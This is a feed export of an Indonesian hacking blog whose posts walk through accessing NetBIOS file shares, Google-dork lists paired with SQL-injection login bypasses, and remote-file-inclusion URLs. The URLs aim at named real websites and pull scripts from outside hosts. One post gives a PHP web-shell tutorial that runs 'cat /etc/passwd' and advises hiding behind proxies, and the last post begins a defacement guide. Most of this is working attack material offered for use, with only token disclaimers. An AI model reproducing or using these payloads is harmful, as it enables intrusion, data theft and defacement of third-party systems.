statistics, pausing interval seconds&lt;br /&gt;    between each display. Press Ctrl+C to stop redisplaying statistics.&lt;br /&gt;&lt;br /&gt;    Dari informasi diatas sebenarnya sudah dapat kita ketahui fungsi dari nbtstat.exe&lt;br /&gt;&lt;br /&gt;    Pada kesempatan ini saya akan coba mengulas 2 option diatas yaitu :&lt;br /&gt;    -A&lt;br /&gt;    -a&lt;br /&gt;&lt;br /&gt;    misal kita mau mencoba komputer dengan names belog.wasantara.net.id&lt;br /&gt;    maka kita gunakan :&lt;br /&gt;    nbtstat -a belog.wasantara.net.id&lt;br /&gt;&lt;br /&gt;    misal kita mau mencoba komputer dengan ip 192.168.1.1&lt;br /&gt;    maka kita gunakan :&lt;br /&gt;    nbtstat -A 192.168.1.1&lt;br /&gt;&lt;br /&gt;    Dari perintah diatas kemungkinan yang muncul adalah :&lt;br /&gt;    1. Host not found&lt;br /&gt;    2. Dan pesan indah seperti dibawah ini :&lt;br /&gt;&lt;br /&gt;    --------------------------------------------&lt;br /&gt;&lt;br /&gt;    NetBIOS Local Name Table&lt;br /&gt;&lt;br /&gt;    Name Type Status&lt;br /&gt;    ---------------------------------------------&lt;br /&gt;    BELOG &lt;00&gt; UNIQUE Registered&lt;br /&gt;    POLOS &lt;00&gt; GROUP Registered&lt;br /&gt;    BELOG &lt;03&gt; UNIQUE Registered&lt;br /&gt;    BELOG &lt;20&gt; UNIQUE Registered&lt;br /&gt;    POLOS &lt;1e&gt; GROUP Registered&lt;br /&gt;&lt;br /&gt;    ---------------------------------------------&lt;br /&gt;&lt;br /&gt;    Jika muncul pesan Host not found, segera hentikan usaha anda, karena akan buang waktu sia sia :)&lt;br /&gt;&lt;br /&gt;    Jika muncul pesan indah seperti diatas, sebaiknya anda tarik napas, karena perkerjaan lain akan menunggu.&lt;br /&gt;    Dari pesan indah tersebut yang menjadi catatan adalah karakter dengan kode BELOG &lt;20&gt; UNIQUE Registered, karena angka 20 ini adalah informasi file dan printer sharing.&lt;br /&gt;&lt;br /&gt;    Apa langkah kita selanjutnya ?&lt;br /&gt;    Setelah kita mempunyai info diatas, cari file yang bernama :&lt;br /&gt;    LMHOST atau HOST (win 9x)&lt;br /&gt;&lt;br /&gt;    Jika sudah ketemu, buka dengan editor seperti noteped dan tambahkan :&lt;br /&gt;    192.168.1.1 BELOG&lt;br /&gt;&lt;br /&gt;    Kemudian simpan.&lt;br /&gt;&lt;br /&gt;    Selanjutnya&lt;br /&gt;    Click Start--&gt;Find--&gt;Computer&lt;br /&gt;    masukan nama atau ipnya&lt;br /&gt;&lt;br /&gt;    Dan anda pasti akan berteriak girang, karena komputer remote sudah bisa anda jadikan seperti HD secondary anda :)&lt;br /&gt;&lt;br /&gt;    Selamat :)&lt;br /&gt;    nb : sekali lagi, mohon tulisan ini hanya sebagai bahan pembelajaran saja dan bukan digunakan untuk merusak dan dari tulisan ini saya berharap, kita jangan seenaknya membuka file/printer sharing&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-3581219414589422209?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/3581219414589422209/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2010/02/meremote-komputer-orang.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/3581219414589422209'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/3581219414589422209'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2010/02/meremote-komputer-orang.html' title='MEREMOTE KOMPUTER ORANG'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-572000297186678203</id><published>2010-02-23T11:58:00.001+07:00</published><updated>2010-02-23T12:00:15.530+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>HACK SITE DENGAN INJEK SQL</title><content type='html'>Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya uptodate tiap menit bahkan detik siapa tuh yang update yahh para hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN INI.titik&lt;br /&gt;&lt;br /&gt;Pembahasan:&lt;br /&gt;&lt;br /&gt;------------------------------------------------&lt;br /&gt;keyword:inurl:"/cart.php?m="&lt;br /&gt;contoh:http://www.facesbyfelicia.com/store/cart.php?m=view&lt;br /&gt;ganti tulisn cart.php?m=view dengan admin&lt;br /&gt;jadi http://www.facesbyfelicia.com/store/admin&lt;br /&gt;trus login pake sql username : 'or"=" password :'or"="&lt;br /&gt;------------------------------------------------&lt;br /&gt;keyword inurl:"/modernbill"&lt;br /&gt;contoh:http://billing.ourweb.net/modernbill/&lt;br /&gt;masukin injekannya:include/html/config.php?DIR=http://one-server.us/injek.txt?&lt;br /&gt;jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=http://one-server.us/injek.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action="&lt;br /&gt;contoh http://www.dohertysgym.com/sunshop/index.php&lt;br /&gt;ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin&lt;br /&gt;login pake user: admin pass: 'or''='&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"modules.php?name=SQuery"&lt;br /&gt;injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?&lt;br /&gt;contoh:http://www.dies-world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;google:allinurl:com_galleria&lt;br /&gt;injek:components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://one-server.us/item.txt?&lt;br /&gt;contoh:http://www.a1gpracing.net/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;google:allinurl:"/auth/lostPassword.php"&lt;br /&gt;contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.php&lt;br /&gt;injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?&lt;br /&gt;jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?includePath=http://one-server.us/item.txt&lt;br /&gt;------------------------------------------------&lt;br /&gt;google:intitle:"Multimedia Flash Website Builder"&lt;br /&gt;contoh:www.webdesignhq.com/sitebuilder/index.php&lt;br /&gt;injek:sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?&lt;br /&gt;jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;gogle:"software 2004-2005 by randshop"&lt;br /&gt;contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&amp;amp;katid=32&amp;amp;action=detail&lt;br /&gt;injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?&lt;br /&gt;jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;keyword;"powered by geeklog"&lt;br /&gt;contoh:http://www.kobe-ch.com/index.php&lt;br /&gt;injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?&lt;br /&gt;jadi:http://www.kobe-ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?&lt;br /&gt;------------------------------------------------&lt;br /&gt;google:inurl:"/product.php?printable=" atau "powered by x-cart"&lt;br /&gt;inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin&lt;br /&gt;kekekek biasa sqlnya cari sendiri ya&lt;br /&gt;------------------------------------------------&lt;br /&gt;keyword:inurl:"/index. php?option=com_rsgallery"&lt;br /&gt;bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item,txt?&lt;br /&gt;contoh:http://www.pass-my-shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;keyword:"Advanced Poll" inurl:/admin/&lt;br /&gt;contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php&lt;br /&gt;bug:common.inc.php?base_path=http://elang13.org/item.txt?&lt;br /&gt;jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php?base_path=http://elang13.org/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"powered by cs-cart"&lt;br /&gt;injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"/catalogue.php?cat="&lt;br /&gt;ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak&lt;br /&gt;&lt;br /&gt;inurl:"/DoceboScs" injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt?&lt;br /&gt;inurl:"/DoceboCore" injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?&lt;br /&gt;inurl:"/DoceboLms" injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?&lt;br /&gt;inurl:"/DoceboKms" injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?&lt;br /&gt;inurl:"/DoceboCMS" injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;allinurl:"dload.php"&lt;br /&gt;injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;"powered by squirrelcart"&lt;br /&gt;injek : squirrelcart/cart_content.php?cart_isp_root=&lt;br /&gt;------------------------------------------------&lt;br /&gt;keyword inurl:/ubbthreads/&lt;br /&gt;injek:addpost_newpoll.php?addpoll=preview&amp;amp;thispath=http://elang13.org/hitam.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;allinurl:"index.php?target=categories"&lt;br /&gt;injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;google : "Exhibit Engine 1.5 RC 4"&lt;br /&gt;injek:photo_comment.php?toroot=http://elang13.org/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"/modules/Forums/&lt;br /&gt;injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;allinurl: includes/include_once.php&lt;br /&gt;bug:includes/include_once.php?include_file=http://elang13.org/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;allinurl:/phplivehelper/blank.php&lt;br /&gt;injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;google:"powered by DreamAccount"&lt;br /&gt;injeknya:&lt;br /&gt;auth.cookie.inc.php?da_path=http://elang13.org/item.txt?&lt;br /&gt;auth.header.inc.php?da_path=http://elang13.org/item.txt?&lt;br /&gt;auth.sessions.inc.php?da_path=http://elang13.org/item.txt?&lt;br /&gt;------------------------------------------------&lt;br /&gt;ashopKart20/" ganti tulisan yang ada didepannya ama admin/scart.mdb&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"//comersus/" ganti /store/xxxx.asp dengan&lt;br /&gt;database/comersus.mdb&lt;br /&gt;------------------------------------------------&lt;br /&gt;allinurl:/shop/category.asp/catid=&lt;br /&gt;hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt&lt;br /&gt;http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"/admin/default.asp"&lt;br /&gt;username:admin password:'or''='&lt;br /&gt;span style="color: rgb(51, 51, 255);"&gt;------------------------------------------------&lt;br /&gt;inurl:"/metacart/"&lt;br /&gt;injek : database/metacart.mdb&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"/store/proddetail.asp?prod="&lt;br /&gt;ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"/AdminLogin.asp"&lt;br /&gt;login pake sql ini :&lt;br /&gt;usename:1'or'1'='1&lt;br /&gt;password:1'or'1'='1&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"com_a6mambocredits"&lt;br /&gt;http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt&lt;br /&gt;------------------------------------------------&lt;br /&gt;"Welcome to phpMyAdmin" inurl:main.php&lt;br /&gt;------------------------------------------------&lt;br /&gt;filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )&lt;br /&gt;------------------------------------------------&lt;br /&gt;inurl:"com_peoplebook"&lt;br /&gt;inurl:"com_comprofiler"&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-572000297186678203?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/572000297186678203/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2010/02/hack-site-dengan-injek-sql.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/572000297186678203'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/572000297186678203'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2010/02/hack-site-dengan-injek-sql.html' title='HACK SITE DENGAN INJEK SQL'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-8570927117024070011</id><published>2010-02-23T11:54:00.001+07:00</published><updated>2010-02-23T11:56:32.496+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>HACK SITE DENGAN PHP INJEK</title><content type='html'>Php Injection (updated every day)&lt;br /&gt;Pada kesempatan kali ini kita akan membahas mengenai PhpInjection, apa itu PhpInjection? Bagaimana menemukannya dan bagaimana penanganannya.&lt;br /&gt;Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.&lt;br /&gt;Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya.&lt;br /&gt;Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.&lt;br /&gt;&lt;br /&gt;1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya).&lt;br /&gt;2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita.&lt;br /&gt;3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com.&lt;br /&gt;Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita :&lt;br /&gt;Untuk forum :&lt;br /&gt;allinurl:my_egallery site:.org&lt;br /&gt;allinurl:xgallery site:.org&lt;br /&gt;allinurl:coppermine site:.org&lt;br /&gt;allinurl:4nAlbum site:.org&lt;br /&gt;allinurl:PNphpBB2 site:.org&lt;br /&gt;allinurl:ihm.php?p=&lt;br /&gt;allinurl:.php?bodyfile=&lt;br /&gt;allinurl:/default.php?page=home&lt;br /&gt;allinurl:/folder.php?id=&lt;br /&gt;allinurl:main.php?pagina=&lt;br /&gt;allinurl:/modules.php?name=allmyguests&lt;br /&gt;allinurl:AshNews atau allinurl: /ashnews.php&lt;br /&gt;allinurl:ihm.php?p=*&lt;br /&gt;allinurl:kietu/hit_js.php&lt;br /&gt;allinurl:/Popper/index.php?&lt;br /&gt;keyword : "Powered by phpBB 2.0.6"&lt;br /&gt;keyword : "powered by CubeCart 3.0.6"&lt;br /&gt;keyword : "powered by paBugs 2.0 Beta 3"&lt;br /&gt;Keyword : "powered by AllMyLinks"&lt;br /&gt;keyword : /phorum/login.php&lt;br /&gt;keyword : "powered eyeOs"&lt;br /&gt;allinurl:/includes/orderSuccess.inc.php?glob=&lt;br /&gt;allinurl:modules.php?name=Forums&lt;br /&gt;&lt;br /&gt;Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword.&lt;br /&gt;Kalo memang rajin coba liat ajah listnya di :&lt;br /&gt;-= http://www.geocities.com/kake_rgb/list.txt =-&lt;br /&gt;&lt;br /&gt;4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com&lt;br /&gt;atau kalau kamu tidak berhasil coba dengan list berikut :&lt;br /&gt;Ganti modul :&lt;br /&gt;&lt;br /&gt;1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR&lt;br /&gt;4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&lt;br /&gt;6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=&lt;br /&gt;8. kietu : kietu/index.php?kietu[url_hit]=&lt;br /&gt;9. "Powered by phpBB 2.0.6" : &amp;amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;amp;a=&lt;br /&gt;10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&amp;amp;cart_order_id=1&amp;amp;glob[rootDir]=&lt;br /&gt;11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir=&lt;br /&gt;12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=&lt;br /&gt;&lt;br /&gt;14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;amp;a=eyeOptions.eyeapp&amp;amp;_SESSION%5busr%5d=root&amp;amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&amp;amp;cmd=id&lt;br /&gt;diganti dengan :&lt;br /&gt;/eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;amp;a=eyeOptions.eyeapp&amp;amp;_SESSION%5busr%5d=root&amp;amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&amp;amp;a=&lt;br /&gt;&lt;br /&gt;15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&amp;amp;cart_order_id=1&amp;amp;glob[rootDir]=&lt;br /&gt;&lt;br /&gt;16 allinurl:modules.php?name=Forums : /modules.php?name=&lt;br /&gt;=============================================================================&lt;br /&gt;http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&amp;amp;config[path_admin_include]=http://www.injection.com/cmd?&lt;br /&gt;&lt;br /&gt;==========================================================================&lt;br /&gt;5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.&lt;br /&gt;&lt;br /&gt;6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.&lt;br /&gt;&lt;br /&gt;Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:&lt;br /&gt;&lt;br /&gt;passthru($test);&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.&lt;br /&gt;&lt;br /&gt;Sekarang kita siap untuk melakukan aksi kita.&lt;br /&gt;Ketikkan di address bar dari browser kita alamat berikut:&lt;br /&gt;&lt;br /&gt;http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&amp;amp;?&amp;amp;test=cal&lt;br /&gt;&lt;br /&gt;jika kita berhasil maka kita akan mendapatkan respon sebagai berikut:&lt;br /&gt;June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. Nah klo kamu mau exploit coba yang satu ini :&lt;br /&gt;http://www.example.com/index.php?module=subjects&amp;amp;func=listpages&amp;amp;subid=[SQL]&lt;br /&gt;http://www.example.com/index.php?module=subjects&amp;amp;func=viewpage&amp;amp;pageid=[SQL]&lt;br /&gt;http://www.example.com/index.php?module=subjects&amp;amp;func=listcat&amp;amp;catid=[SQL]&lt;br /&gt;&lt;br /&gt;8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??&lt;br /&gt;&lt;br /&gt;http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&amp;amp;?&amp;amp;test=cat /etc/passwd&lt;br /&gt;&lt;br /&gt;Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe&lt;br /&gt;&lt;br /&gt;Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-8570927117024070011?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/8570927117024070011/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2010/02/hack-site-dengan-php-injek.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/8570927117024070011'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/8570927117024070011'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2010/02/hack-site-dengan-php-injek.html' title='HACK SITE DENGAN PHP INJEK'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-322079168671893216</id><published>2010-02-09T13:52:00.001+07:00</published><updated>2010-02-09T13:52:59.616+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>DEFACE WEBSITE LAGI</title><content type='html'>Cara Deface Website&lt;br /&gt;Diposkan oleh FatkhanSite's&lt;br /&gt;&lt;br /&gt;Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau&lt;br /&gt;merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak&lt;br /&gt;ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu&lt;br /&gt;halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.&lt;br /&gt;Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface&lt;br /&gt;seperti :&lt;br /&gt;&lt;br /&gt;http://www.bandaaceh.go.id&lt;br /&gt;http://www.pertamina.co.id&lt;br /&gt;http://www.transtv.co.id&lt;br /&gt;http://www.setkab.go.id&lt;br /&gt;http://www.pom.go.id&lt;br /&gt;http://www.usni.ac.id&lt;br /&gt;&lt;br /&gt;Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target&lt;br /&gt;mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows&lt;br /&gt;2000 dan servernya adalah IIS 5.0/6.0.&lt;br /&gt;&lt;br /&gt;Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang&lt;br /&gt;susah dan perlu waktu yang lama untuk menyusup ke server tersebut , ternyata hal&lt;br /&gt;tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,&lt;br /&gt;dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan&lt;br /&gt;menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note&lt;br /&gt;pad dan lain lain&lt;br /&gt;&lt;br /&gt;2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /&lt;br /&gt;default.asp atau nama lain tergantung nama file halaman pertama suatu web&lt;br /&gt;terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di